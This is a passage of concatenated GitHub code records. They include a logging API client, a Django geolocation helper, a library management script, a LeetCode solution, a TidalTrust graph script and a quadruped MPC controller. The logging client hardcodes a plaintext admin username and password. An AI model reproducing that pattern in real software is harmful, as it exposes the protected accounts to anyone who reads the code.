f=f+1\n l=l-1\nn=int(len(a)/2)\nf1=n-1\nf2=n+1\nwhile f1>=0 and f2<=len(a):\n for i in range(len(a)):\n if i==f1 or i==f2:\n print(a[i],end=\"\")\n else:\n print(\" \",end=\"\")\n print(\"\\r\")\n f1=f1-1\n f2=f2+1","repo_name":"chandu11feb/Coding_problems","sub_path":"Odd Length String Diagonal Pattern.py","file_name":"Odd Length String Diagonal Pattern.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15918409500","text":"import json\nfrom pathlib import Path\nfrom typing import Union\n\n\ndef flatten_message(message: Union[str, dict, list]) -> str:\n if isinstance(message, str):\n return message\n elif isinstance(message, dict):\n if message['type'] == 'link':\n return ''\n return flatten_message(message['text'])\n elif isinstance(message, list):\n return ' '.join(flatten_message(m) for m in message)\n else:\n raise ValueError(f'message should be str, list or dict. Got {type(message)}')\n\n\ndef read_messages(path: Union[Path, str, bytes]) -> list[str]:\n with open(path) as f:\n data = json.load(f)\n result = []\n for message in (m for m in data['messages'] if m['type'] == 'message'):\n text = flatten_message(message)\n if text:\n result.append(text)\n return result\n","repo_name":"The0nix/chat_wordcloud","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26553168599","text":"import json\nfrom datetime import date\nfrom enum import Enum\n\nimport requests\n\nfrom src.lib.util import Server\nfrom src.lib.util_config import get_ip\n\n\nclass Area(Enum):\n SMT_IN = \"SMT_IN\"\n SMT_OUT = \"SMT_OUT\"\n PACKING = \"PACKING\"\n\n\nclass Type(Enum):\n INFO_SUMMARY_HOUR = 'INFO_SUMMARY_HOUR'\n MISS_TARGET = 'MISS_TARGET'\n\n\ndef get_credentials():\n return {\n 'user': 'iradi_admin',\n 'password': 'root2000'\n }\n\n\ndef logs_dir():\n return f'http://{get_ip(Server.ONLINE)}:3040/api/collections/logs/records'\n\n\ndef get_token():\n try:\n url = f'http://{get_ip(Server.ONLINE)}:3040/api/collections/users/auth-with-password'\n token = requests.post(\n url=url,\n data={\"identity\": get_credentials()['user'], \"password\": get_credentials()['password']}\n )\n\n if token.status_code == 200:\n return token.json()['token']\n\n except requests.exceptions.HTTPError as errh:\n print(\"Http Error:\", errh)\n except requests.exceptions.ConnectionError as errc:\n print(\"Error Connecting:\", errc)\n except requests.exceptions.Timeout as errt:\n print(\"Timeout Error:\", errt)\n except requests.exceptions.RequestException as err:\n print(\"OOps: Something Else\", err)\n return ''\n\n\ndef get_current_day_lost_target_logs():\n current_day = date.today().strftime(\"%Y-%m-%d\")\n try:\n logs = requests.get(\n url=logs_dir() + f'?perPage=500&filter=(date = \"{current_day}\" %26%26 type = \"MISS_TARGET\")',\n headers={\n 'Content-Type': 'application/json',\n 'Authorization': get_token()\n }\n )\n\n if logs.status_code == 200:\n return logs.json()['items']\n pass\n\n except requests.exceptions.HTTPError as errh:\n print(\"Http Error:\", errh)\n except requests.exceptions.ConnectionError as errc:\n print(\"Error Connecting:\", errc)\n except requests.exceptions.Timeout as errt:\n print(\"Timeout Error:\", errt)\n except requests.exceptions.RequestException as err:\n print(\"OOps: Something Else\", err)\n\n\ndef post_target_loss_log(area: Area, index, line, uph, target):\n current_day = date.today().strftime(\"%Y-%m-%d\")\n try:\n logs = requests.post(\n url=logs_dir(),\n headers={\n 'Content-Type': 'application/json',\n 'Authorization': get_token()\n },\n data=json.dumps({\n \"date\": current_day,\n \"hour\": \"00:00:00\",\n \"index\": index,\n \"line\": line,\n \"area\": area.value,\n \"type\": Type.MISS_TARGET.value,\n \"payload\": {\n \"status\": 'open',\n \"issues_id\": [],\n \"fix_val\": [\n index,\n uph,\n target\n ]\n }\n })\n )\n\n print(logs.status_code)\n return logs.status_code\n\n except requests.exceptions.HTTPError as errh:\n print(\"Http Error:\", errh)\n except requests.exceptions.ConnectionError as errc:\n print(\"Error Connecting:\", errc)\n except requests.exceptions.Timeout as errt:\n print(\"Timeout Error:\", errt)\n except requests.exceptions.RequestException as err:\n print(\"OOps: Something Else\", err)\n","repo_name":"SkyLicht/ie_tool_server","sub_path":"src/http/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40780489834","text":"from .models import Delivery, Outlet\nfrom django.http.response import JsonResponse\nfrom django.contrib.gis.measure import D\nfrom django.contrib.gis.db.models.functions import Distance\n\ndef check_if_delivery(point):\n try:\n deliveries = Delivery.objects.filter(polygon_area__contains = point)\n if deliveries:\n return deliveries[0].delivery_id\n else:\n return False\n except Exception as e:\n return JsonResponse({'error' : str(e)}, status = 400)\n\n\ndef check_nearby_outlet(point):\n try:\n outlets = Outlet.objects.filter(location__distance_lte=(point, 0.09009)).annotate(distance=Distance('location', point)).order_by('distance')\n if outlets:\n data = []\n for i in outlets:\n outlet_details = {\n \"outlet_id\": i.outlet_id,\n \"outlet_name\": i.name,\n \"location\": str(i.lat) + str(i.long),\n \"distance\": i.distance*111.0\n }\n data.append(outlet_details)\n return JsonResponse(data, safe=False, status=200)\n else:\n return JsonResponse({'error': 'No outlets within 10 km distance detected'}, status=400)\n except Exception as e:\n return JsonResponse({'error': str(e)}, status=400)\n","repo_name":"Candi2733/Django","sub_path":"geocoding/map/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22621257436","text":"import datetime \r\nimport os\r\nos.getcwd()\r\n \r\nclass LMS:\r\n def __init__(self, list_of_books, library_name):\r\n self.list_of_books = \"list_of_books.txt\"\r\n self.library_name = library_name\r\n self.books_dict = {}\r\n id = 101\r\n with open(self.list_of_books) as b:\r\n content = b.readlines()\r\n for line in content:\r\n self.books_dict.update({str(id):{\"books_title\":line.replace(\"\\n\",\"\"),\"lender_name\": \"\",\"Issue_date\":\"\",\"Status\":\"Ada\"}})\r\n id = id + 1\r\n\r\n def display_books(self):\r\n print(\"--------------------Daftar Buku--------------------\")\r\n print(\"ID Buku\", \"\\t\",\"Judul\")\r\n print(\"---------------------------------------------------\")\r\n for key, value in self.books_dict.items():\r\n print(key,\"\\t\\t\",value.get(\"books_title\"), \"- [\",value.get(\"Status\"),\"]\")\r\n\r\n def Issue_books(self):\r\n books_id = input(\"Masukkan ID buku: \")\r\n current_date = datetime.datetime.now().strftime(\"%Y-%m_%d %H:%M:%S\")\r\n if books_id in self.books_dict.keys():\r\n if not self.books_dict[books_id][\"Status\"] == \"Ada\":\r\n print(f\"Buku ini telah dipinjam oleh {self.books_dict[books_id]['lender_name']} \\ di tanggal {self.books_dict[books_id]['Issue_date']}\")\r\n return self.Issue_books()\r\n elif self.books_dict[books_id]['Status'] == \"Ada\":\r\n your_name = input(\"Masukkan nama anda: \")\r\n self.books_dict[books_id]['lender_name'] = your_name\r\n self.books_dict[books_id]['Issue_date'] = current_date\r\n self.books_dict[books_id]['Status'] = \"Sudah Dipinjamkan\"\r\n print(\"Buku berhasil dipinjamkan!!! \\n\")\r\n else:\r\n print(\"ID buku tidak ditemukan\")\r\n return self.Issue_books()\r\n\r\n def add_books(self):\r\n new_books = input(\"Masukkan judul buku: \")\r\n if new_books == \"\":\r\n return self.add_books()\r\n elif len(new_books) > 25:\r\n print(\"Judul buku terlalu panjang! batas jumlah huruf untuk judul adalah 25\")\r\n return self.add_books()\r\n else:\r\n with open(self.list_of_books,\"a\") as b:\r\n b.writelines(f\"{new_books}\\n\")\r\n self.books_dict.update({str(int(max(self.books_dict))+1):{'books_title':new_books,'lender_name':'','lend_date':'', 'status':'Ada'}})\r\n print(f\"Buku '{new_books}' telah berhasil ditambahkan!\")\r\n\r\n def return_books(self):\r\n books_id = input(\"Masukkan ID buku: \")\r\n if books_id in self.books_dict.keys():\r\n if self.books_dict[books_id][\"Status\"] == \"Ada\":\r\n print(\"Buku ini belum dipinjamkan dan masih di perpustakaan ZETA. Mohon periksa ulang ID buku\")\r\n return self.return_books()\r\n elif not self.books_dict[books_id][\"Status\"] == \"Ada\":\r\n self.books_dict[books_id][\"lender_name\"] = \"\"\r\n self.books_dict[books_id][\"Issue_date\"] = \"\"\r\n self.books_dict[books_id][\"Status\"] = \"Ada\"\r\n print(\"Buku berhasil dikembalikan!\")\r\n else:\r\n print(\"ID buku tidak ditemukan, mohon periksa kembali\")\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n mylms = LMS(\"list_of_books.txt\", \"ZETA\")\r\n press_key_list = {\"D\": \"Daftar Buku\", \"M\": \"Minjam Buku\", \"N\": \"Nambah Buku\", \"O\": \"Mengembalikan Buku\", \"Q\": \"Quit\"} \r\n \r\n key_press = False\r\n while not (key_press == \"q\"):\r\n print(f\"\\n----------Selamat datang ke Sistem Manajemen Perpustakaan {mylms.library_name}---------\\n\")\r\n for key, value in press_key_list.items():\r\n print(\"Press\", key, \"To\", value)\r\n key_press = input(\"Press Key : \").lower()\r\n if key_press == \"m\":\r\n print(\"\\nMenu Pilihan : Minjam Buku\\n\")\r\n mylms.Issue_books()\r\n \r\n elif key_press == \"n\":\r\n print(\"\\nMenu Pilihan : Nambah Buku\\n\")\r\n mylms.add_books()\r\n\r\n elif key_press == \"d\":\r\n print(\"\\nMenu Pilihan : Daftar Buku\\n\")\r\n mylms.display_books()\r\n \r\n elif key_press == \"o\":\r\n print(\"\\nMenu Pilihan : Mengembalikan Buku\\n\")\r\n mylms.return_books()\r\n elif key_press == \"q\":\r\n break\r\n else:\r\n continue\r\n except Exception as e:\r\n print(\"Sistem Error, Mohon Periksa Ulang!!!!\")\r\n","repo_name":"aditiapawaid/LearnPy","sub_path":"Python LMS.py","file_name":"Python LMS.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"72288679171","text":"import pkg_resources\n\n__cached = None\n\ndef get_environment():\n global __cached\n if __cached is None:\n __cached = [\n {\"name\": str(pkg.project_name), \"path\": str(pkg.location), \"version\": str(pkg.parsed_version) } for pkg in pkg_resources.working_set\n ]\n return __cached","repo_name":"d-krupke/AeMeasure","sub_path":"aemeasure/utils/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"34572870859","text":"import sys\n\nTAG = \"\"\n\ncontent_filename = sys.argv[1]\nhtml_filename = sys.argv[2]\n\nwith open(content_filename, 'r') as content_file:\n content = content_file.read()\n \n with open(html_filename, 'r') as html_file:\n result = html_file.read().replace(TAG, content, 1)\n print(result)","repo_name":"gutoboranga/poa-accidents-map","sub_path":"leaflet/html_filler.py","file_name":"html_filler.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11266875035","text":"# LeetCode 39\n\n'''\nGiven an array of distinct integers candidates and a target integer target, return a list of all unique combinations of candidates where the chosen numbers sum to target. You may return the combinations in any order.\n\nThe same number may be chosen from candidates an unlimited number of times. Two combinations are unique if the frequency of at least one of the chosen numbers is different.\n\nIt is guaranteed that the number of unique combinations that sum up to target is less than 150 combinations for the given input.\n\n\nExample 1:\nInput: candidates = [2,3,6,7], target = 7\nOutput: [[2,2,3],[7]]\n\nExplanation:\n2 and 3 are candidates, and 2 + 2 + 3 = 7. Note that 2 can be used multiple times.\n7 is a candidate, and 7 = 7.\nThese are the only two combinations.\n'''\n\ndef combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n ans=[]\n \n '''\n Backtracking\n i -> pointer for candidates\n arr -> temp array for making combinations\n total -> sum of temp combinations\n ans -> final array of all satisfying combination\n '''\n \n def dfs(i,arr,total):\n # combination of candidates where sum = target\n if total==target:\n ans.append(arr.copy())\n return\n \n # all candidates used or \n # total > target ,i.e we can't get any combinations using ith candidate further.\n if i>=len(candidates) or total>target:\n return\n \n ''' left branch will contain all combinations with ith candidate and right branch will contain combinations excluding ith candidate '''\n \n # (left branch) adding next candidate to arr.\n arr.append(candidates[i])\n dfs(i, arr, total+candidates[i])\n \n # (right branch) removing ith element that was previously used.\n arr.pop()\n dfs(i+1, arr, total)\n \n dfs(0,[],0)\n \n return ans\n","repo_name":"vedant115/LeetCode","sub_path":"Daily LeetCode Challenge/February/Combination_Sum.py","file_name":"Combination_Sum.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26879860997","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nfrom itertools import compress\nimport numpy as np\n\ngraph = [(1, 2),(1, 3),(1, 4),(2, 5),(2, 6),(3, 5),(3, 6),(4, 6),(5, 7),(6, 7)]#,(6, 8)]\n#node_max should have an element for each unique node in the graph\n#node_max = [0,9,8,10,9,9,0]#,0]\nnode_max = []\n#ratings should be of length len(graph)\nratings = [9,8,10,9,8,10,10,9,8,6]#,0]\nq = []\ncolor = [0]*len(graph)\n\ndef get_graph(graph):\n\n # extract nodes from graph\n nodes = set([n1 for n1, n2 in graph] + [n2 for n1, n2 in graph])\n # node_max = [0]* len(nodes)\n # create networkx graph\n # G=nx.Graph()\n G = nx.DiGraph()\n\n # add nodes\n for node in nodes:\n \t# G.add_node(node, max=node_max[node-1])\n \tG.add_node(node, max=0)\n\n # add edges\n for edge in graph:\n G.add_edge(edge[0], edge[1], rating=ratings[graph.index(edge)])\n # print(\"index ed\", graph.index(edge))\n\n # draw graph\n # pos = nx.shell_layout(G)\n # nx.draw(G, pos)\n\n # show graph\n # plt.show()\n return G\n\ndef draw_graph(G, graph, labels=None, graph_layout='shell',\n node_size=1600, node_color='blue', node_alpha=0.3,\n node_text_size=12,\n edge_color='blue', edge_alpha=0.3, edge_tickness=1,\n edge_text_pos=0.3,\n text_font='sans-serif'):\n\n \n # these are different layouts for the network you may try\n # shell seems to work best\n if graph_layout == 'spring':\n graph_pos=nx.spring_layout(G)\n elif graph_layout == 'spectral':\n graph_pos=nx.spectral_layout(G)\n elif graph_layout == 'random':\n graph_pos=nx.random_layout(G)\n else:\n graph_pos=nx.shell_layout(G)\n\n \n nx.draw_networkx_nodes(G,graph_pos,node_size=node_size, \n alpha=node_alpha, node_color=node_color)\n nx.draw_networkx_edges(G,graph_pos,width=edge_tickness,\n alpha=edge_alpha,edge_color=edge_color)\n node_labels = nx.get_node_attributes(G,'max')\n nx.draw_networkx_labels(G, graph_pos,labels = node_labels,font_size=node_text_size,\n font_family=text_font)\n\n # if labels is None:\n # labels = range(len(graph))\n\n edge_labels = nx.get_edge_attributes(G,'rating')\n nx.draw_networkx_edge_labels(G, graph_pos, edge_labels=edge_labels, \n label_pos=edge_text_pos)\n\n # show graph\n plt.show()\n\n# def path_flow(scores,node):\n# \t#get edges list\n# \t#from find edges ending with node\n# \t#return min\n\n# \tpass\n\ndef tidal_trust(source, sink):\n\tglobal q\n\tglobal node_max\n\td = [];\n\tq.append(source)\n\td.append(source)\n\tdepth = 1\n\tmax_depth = 1000\n\tfound = False\n\ttemp_q = []\n\tscores = nx.get_edge_attributes(g, 'rating')\n\n\tcache_rating = []\n\n\n\twhile (len(q) != 0 & depth <= max_depth):\n\t\tnl = q.pop()\n\t\tprint(\"current top node\", nl)\n\t\t\n\t\tfor n in g.neighbors(nl):\n\t\t\t# if depth > 1:\n\t\t\t# \tprint(\"my[\",n,\"]parent(s): \", d[depth-1])\n\t\t\t# else:\n\t\t\t\t# print(\"my[\",n,\"]parent(s): \", nl)\n\t\t\t\n\t\t\tprint(\"my[\",n,\"] fake parent(s) : \", d[depth-1])\n\t\t\t\n\t\t\tko = [e[1]== n for e in g.edges]\n\t\t\ttemp_l = list(compress(g.edges(), ko))\n\t\t\t# print(\"temp_l\", temp_l)\n\t\t\tmax_list = []\n\t\t\tpp_list = []\n\t\t\t[pp_list.append(l[0]) for l in temp_l]\n\t\t\tprint(\"pp list\",pp_list)\n\t\t\tatts = nx.get_node_attributes(g,'max')\n\t\t\t\n\t\t\t[max_list.append(atts[l[0]]) for l in list(compress(g.edges(), ko))]\n\n\t\t\tprint(\"real parents maxes\", max_list)\n\t\t\tr = scores[(nl,n)]\n\t\t\tif depth == 1:\n\t\t\t\tg.node[n]['max'] = r\n\t\t\telse:\n\t\t\t\tg.node[n]['max'] = max(max_list)\n\t\t\t\tprint('max_node',pp_list[np.argmax(max_list)])\n\t\t\t\tprint('max_node scored me', scores[(pp_list[np.argmax(max_list)],n)] )\n\t\t\t\tg.node[n]['max'] = min(max(max_list),scores[(pp_list[np.argmax(max_list)],n)]) \n\n\t\t\tif n == sink:\n\t\t\t\tcache_rating.append(scores[(nl,n)])\n\t\t\t\tfound = True\n\t\t\t\tprint(\"found\")\n\t\t\t\t# print(\"cache_rating\", cache_rating)\n\t\t\t\tmax_depth = depth\n\t\t\t\t# print(\"found depth\", depth)\n\t\t\t\t# print(\"previous level\", d[depth-2])\n\t\t\t\t# get the max node leading to n\n\t\t\t\t#the\n\t\t\t\tflow = min(cache_rating)\n\t\t\t\t# print(\"min=\",flow)\n\t\t\t\t# d.append([n])\n\t\t\t\t# children.append(sink)\n\t\t\t\ttemp_q.append(n)\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tif color[n] == 0:\n\t\t\t\t\tcolor[n] = 1\n\t\t\t\t\ttemp_q.append(n)\n\t\t\t\t\t#get the max node leading to n\n\t\t\t\t\t#the\n\t\t\t\t# print(\">>>>>>>>>\")\n\n\t\t# print(\"cache_rating\", cache_rating)\n\t\tif not q:\n\t\t\td.append(temp_q[:])\n\t\t\tif(not found):\n\t\t\t\tq = temp_q\n\t\t\t\t# d.append(temp_q[:])\n\t\t\t\t# print(d)\n\t\t\t\tdepth = depth + 1\n\t\t\t\ttemp_q = []\n\n\tprint(\"d\",d)\n\t# print(\"depth\",depth)\n\tuuu = nx.get_node_attributes(g,'max')\n\tnode_max = uuu\n\t# print(\"maxes\", node_max)\n\twhile not d:\n\t\tprint(d.pop())\n\ng = get_graph(graph)\ndraw_graph(g, graph)\ntidal_trust(1,7)\ndraw_graph(g, graph)\n\n","repo_name":"xahiru/tidal_trust","sub_path":"tidal_trust.py","file_name":"tidal_trust.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"39233328260","text":"\"\"\"\n% 2023\n% Alexander Schperberg\n% aschperberg28@g.ucla.edu\n% 06/20/23\n\"\"\"\nimport pdb\n\n# This file provides a stance leg controller (through force MPC), modeled after the paper: 'Dynamic Locomotion in\n# the MIT Cheetah 3 Through Convex Model Predictive Control' by Jared Dicarlo, Patrick M. Wensing, Benjamin Katz,\n# Gerardo Bledt, and Sangbae Kim'\nfrom casadi import *\nimport numpy as np\n\nclass StanceController():\n def __init__(self, N, Q, R, P, dt):\n # length of the prediction horizon\n self.N = N\n # state weighing matrix\n self.Q = Q\n # control weighing matrix\n self.R = R\n # terminal weighing matrix\n self.P = P\n # discretized time\n self.dt = dt\n # gravity term\n self.g = vertcat(0, 0, 0, 0,0,0,0,0,0,0,0,-9.81)\n # robot mass\n self.m = 8.8\n # set the rotational inertia matrix of the robot in the body frame\n Px = 55303643.08 / (10 ** 9)\n Py = 60119440.34 / (10 ** 9)\n Pz = 105304340.05 / (10 ** 9)\n self.I = np.array([[Px, 0, 0], [0, Py, 0], [0, 0, Pz]])\n # zero matrix\n self.zero_mat = np.array([[0,0,0],[0,0,0],[0,0,0]])\n # identity matrix\n self.identity = np.array([[1,0,0],[0,1,0],[0,0,1]])\n # identity over mass matrix\n self.identity_m = np.array([[1 / self.m, 0, 0], [0, 1 / self.m, 0], [0, 0, 1 / self.m]])\n # initialize variables\n self.initialize_variables()\n\n def initialize_variables(self):\n # initialize the opti stack helper class, using the 'conic' keyword as we will use qpOases\n self.opti = casadi.Opti('conic')\n # initialize the robot states: heading angle (th), center of mass base position (r), angular velocity (dth),\n # linear velocity (dr)\n # initialize the robot controls: ground reaction forces per foot\n self.f1 = self.opti.variable(3, self.N)\n self.f2 = self.opti.variable(3, self.N)\n self.f3 = self.opti.variable(3, self.N)\n self.f4 = self.opti.variable(3, self.N)\n self.controls = vertcat(self.f1, self.f2, self.f3, self.f4)\n # provide a parameter for the reference states (reference must include current value)\n self.body_mpc = self.opti.parameter(12, self.N+1)\n # provide a parameter for the reference footstep positions in the base frame (references must include current value)\n self.p_mpc = self.opti.parameter(12, self.N+1)\n # provide a parameter for the contact matrix (0 means foot is in swing, and 1 means foot is in stance)\n self.contact_mpc = self.opti.parameter(4,self.N)\n # since dt may change, we make it a parameter\n self.dt_param = self.opti.parameter(1, 1)\n self.opti.set_value(self.dt_param,self.dt)\n # set up the MPC problem\n self.objective_function()\n self.control_constraints()\n self.initialize_solver()\n\n def objective_function(self):\n # calculates the summation of cost from the paper\n self.cost = 0\n state = self.body_mpc[:,0]\n for i in range(self.N):\n # get the orientation angles needed for the rotation matrix from the reference trajectory\n thx = self.body_mpc[0, i]\n thy = self.body_mpc[1, i]\n thz = self.body_mpc[2, i]\n # calculate the unique A matrix using the current orientation\n self.A = self.dyanmic_matrix_A(thx, thy, thz)\n\n # retrieve the reference footstep positions\n r, p1, p2, p3, p4 = self.body_mpc[3:6, i], self.p_mpc[0:3, i], self.p_mpc[3:6, i], self.p_mpc[6:9,\n i], self.p_mpc[9:12, i]\n\n # calculate the unique B matrix using the current reference orientation and footstep positions\n self.B = self.dynamic_matrix_B(thx, thy, thz, p1, p2, p3, p4)\n\n control_t = self.controls[:, i]\n # calculate the next state, using the time-invarient linearly discretized equation\n I = np.eye(12, 12)\n\n state = mtimes(I + self.A * self.dt_param, state) + mtimes(self.B * self.dt_param, control_t) + self.dt_param * self.g\n\n state_ref = self.body_mpc[:, i+1]\n control = self.controls[:, i]\n\n if i == self.N-1:\n self.cost = self.cost + mtimes(mtimes((state - state_ref).T, self.P), state - state_ref)\\\n + \\\n mtimes(mtimes((control).T, self.R), control)\n else:\n self.cost = self.cost + mtimes(mtimes((state - state_ref).T, self.Q), state - state_ref) \\\n + \\\n mtimes(mtimes((control).T, self.R), control)\n\n def control_constraints(self):\n # we must ensure that the force is zero when the leg is in swing. To do this, we calculate the force selection\n # matrix using the reference contact matrix\n for k in range(self.N):\n # create the stance/swing selection matrix\n # if foot is in swing phase, we want to make sure that the forces will be equal to zero at all times. A zero\n # means foot is currently in swing and not in contact with the ground\n D1 = if_else(self.contact_mpc[0, k] == 0, self.identity, self.zero_mat)\n D2 = if_else(self.contact_mpc[1, k] == 0, self.identity, self.zero_mat)\n D3 = if_else(self.contact_mpc[2, k] == 0, self.identity, self.zero_mat)\n D4 = if_else(self.contact_mpc[3, k] == 0, self.identity, self.zero_mat)\n D = vertcat(horzcat(D1, self.zero_mat, self.zero_mat, self.zero_mat),\n horzcat(self.zero_mat, D2, self.zero_mat, self.zero_mat),\n horzcat(self.zero_mat, self.zero_mat, D3, self.zero_mat),\n horzcat(self.zero_mat, self.zero_mat, self.zero_mat, D4))\n # we now set forces to zero for the feet not on the ground\n self.opti.subject_to(mtimes(D, self.controls[:, k]) == 0)\n\n # for the feet on the ground, we must impose friction cone constraints. A one indicates food is making contact\n F1 = if_else(self.contact_mpc[0, k] == 1, self.identity, self.zero_mat)\n F2 = if_else(self.contact_mpc[1, k] == 1, self.identity, self.zero_mat)\n F3 = if_else(self.contact_mpc[2, k] == 1, self.identity, self.zero_mat)\n F4 = if_else(self.contact_mpc[3, k] == 1, self.identity, self.zero_mat)\n f1 = mtimes(F1, self.controls[0:3, k])\n f2 = mtimes(F2, self.controls[3:6, k])\n f3 = mtimes(F3, self.controls[6:9, k])\n f4 = mtimes(F4, self.controls[9:12, k])\n\n # we now make the friction cone constraints (note, that if force of the foot is zero, as done using the\n # if_else statement above for feet in swing, the contact constraints are automatically satisfied for that\n # foot)\n self.contact_constraints(f1)\n self.contact_constraints(f2)\n self.contact_constraints(f3)\n self.contact_constraints(f4)\n\n def contact_constraints(self, f):\n # input of the function is the reaction force of the leg\n fx = f[0]\n fy = f[1]\n fz = f[2]\n self.opti.subject_to(self.opti.bounded(-0,fz,150))\n # coefficient of friction\n mu = 0.6\n # friction cone constraints\n self.opti.subject_to(self.opti.bounded(-mu * fz, fx, mu * fz))\n self.opti.subject_to(self.opti.bounded(-mu * fz, -fx, mu * fz))\n self.opti.subject_to(self.opti.bounded(-mu * fz, fy, mu * fz))\n self.opti.subject_to(self.opti.bounded(-mu * fz, -fy, mu * fz))\n\n\n def rotation_matrix_inv(self, thx, thy, thz):\n # thz is yaw, thy is pitch, and thx is roll\n # we assume non-zero values for roll, pitch, and yaw\n # we assume non-zero roll, pitch, and yaw\n # body to world\n R = vertcat(horzcat(cos(thz) / cos(thy), sin(thz) / cos(thy), 0),\n horzcat(-sin(thz), cos(thz), 0),\n horzcat(cos(thz) * tan(thy), sin(thz) * tan(thy), 1))\n\n return R\n\n def rotation_matrix_body_world(self, thx, thy, thz):\n th = [thx,thy,thz]\n # rotation matrix of body to world\n Rz = vertcat(horzcat(cos(th[2]), -sin(th[2]), 0), horzcat(sin(th[2]), cos(th[2]), 0), horzcat(0, 0, 1))\n Ry = vertcat(horzcat(cos(th[1]), 0, sin(th[1])), horzcat(0, 1, 0), horzcat(-sin(th[1]), 0, cos(th[1])))\n Rx = vertcat(horzcat(1, 0, 0), horzcat(0, cos(th[0]), -sin(th[0])), horzcat(0, sin(th[0]), cos(th[0])))\n\n R = mtimes(Rz, mtimes(Ry, Rx))\n\n return R\n\n def dyanmic_matrix_A(self, thx, thy, thz):\n # note, thy and thz are from the reference trajectories (we may also average them like in the paper,\n # but in this code I decided not to) - the matrix was changed from how it is written in the paper,\n # with gravity term, instead, inside the A matrix)\n R = self.rotation_matrix_body_world(thx, thy, thz)\n\n # equation 16 (gravity term has been incorporated into the A matrix for convenience)\n A = vertcat(horzcat(self.zero_mat, self.zero_mat, transpose(R), self.zero_mat),\n horzcat(self.zero_mat, self.zero_mat, self.zero_mat, self.identity),\n horzcat(self.zero_mat, self.zero_mat, self.zero_mat, self.zero_mat),\n horzcat(self.zero_mat, self.zero_mat, self.zero_mat, self.zero_mat))\n\n return A\n\n def dynamic_matrix_B(self, thx, thy, thz, p1, p2, p3, p4):\n # thy, thz is pitch and yaw for the body to world rotation. I is the inertia matrix in the base/body\n # frame, r is the center of mass position of the robot, p1, p2, p3, and p4 are the footstep positions\n\n # we calculate the inertia tensor in the world frame, and then invert it (equations 15-16)\n R = self.rotation_matrix_body_world(thx, thy, thz)\n I_hat = mtimes(R, mtimes(self.I, transpose(R)))\n I_hat_inv = inv(I_hat)\n\n p1 = mtimes(R, p1)\n p2 = mtimes(R, p2)\n p3 = mtimes(R, p3)\n p4 = mtimes(R, p4)\n\n d1 = skew(vertcat(p1[0], p1[1], p1[2]))\n d2 = skew(vertcat(p2[0], p2[1], p2[2]))\n d3 = skew(vertcat(p3[0], p3[1], p3[2]))\n d4 = skew(vertcat(p4[0], p4[1], p4[2]))\n\n # calculate matrix B (equation 16)\n B = vertcat(horzcat(self.zero_mat, self.zero_mat, self.zero_mat, self.zero_mat),\n horzcat(self.zero_mat, self.zero_mat, self.zero_mat, self.zero_mat),\n horzcat(mtimes(I_hat_inv, d1), mtimes(I_hat_inv, d2), mtimes(I_hat_inv, d3), mtimes(I_hat_inv, d4)),\n horzcat(self.identity_m, self.identity_m, self.identity_m, self.identity_m))\n\n return B\n\n def initialize_solver(self):\n # initiate objective function into solver\n opts = {'printLevel': \"none\"}\n self.opti.minimize(self.cost)\n self.opti.solver('qpoases', opts)\n\ndef rotation_matrix_body_world_numpy(thx, thy, thz):\n # thx,thy,thz = thx[0],thy[0],thz[0]\n # rotation matrix of body to world\n th = np.array([thx, thy, thz])\n Rz = np.vstack((np.hstack((np.cos(th[2]), -np.sin(th[2]), 0)), np.hstack((np.sin(th[2]), np.cos(th[2]), 0)), np.hstack((0, 0, 1))))\n Ry = np.vstack((np.hstack((np.cos(th[1]), 0, np.sin(th[1]))), np.hstack((0, 1, 0)), np.hstack((-np.sin(th[1]), 0, np.cos(th[1])))))\n Rx = np.vstack((np.hstack((1, 0, 0)), np.hstack((0, np.cos(th[0]), -np.sin(th[0]))), np.hstack((0, np.sin(th[0]), np.cos(th[0])))))\n\n R = np.matmul(Rz, np.matmul(Ry, Rx))\n\n return R\n\n# calculates P Matrix below\nzero_mat = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])\n# identity matrix\nidentity = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])\n# robot mass\nrobot_m = 8.8\n# identity over mass matrix\nidentity_m = np.array([[1 / robot_m, 0, 0], [0, 1 / robot_m, 0],\n [0, 0, 1 / robot_m ]])\nA = np.vstack((np.hstack((zero_mat, zero_mat, zero_mat, zero_mat)),\n np.hstack((zero_mat, zero_mat, zero_mat, identity)),\n np.hstack((zero_mat, zero_mat, zero_mat, zero_mat)),\n np.hstack((zero_mat, zero_mat, zero_mat, zero_mat))))\nB = np.vstack((np.hstack((zero_mat, zero_mat, zero_mat, zero_mat)),\n np.hstack((zero_mat, zero_mat, zero_mat, zero_mat)),\n np.hstack((zero_mat, zero_mat, zero_mat, zero_mat)),\n np.hstack((identity_m, identity_m, identity_m, identity_m))))\n# set the rotational inertia matrix of the robot in the body frame\nPx = 55303643.08 / (10 ** 9)\nPy = 60119440.34 / (10 ** 9)\nPz = 105304340.05 / (10 ** 9)\nI = np.array([[Px, 0, 0], [0, Py, 0], [0, 0, 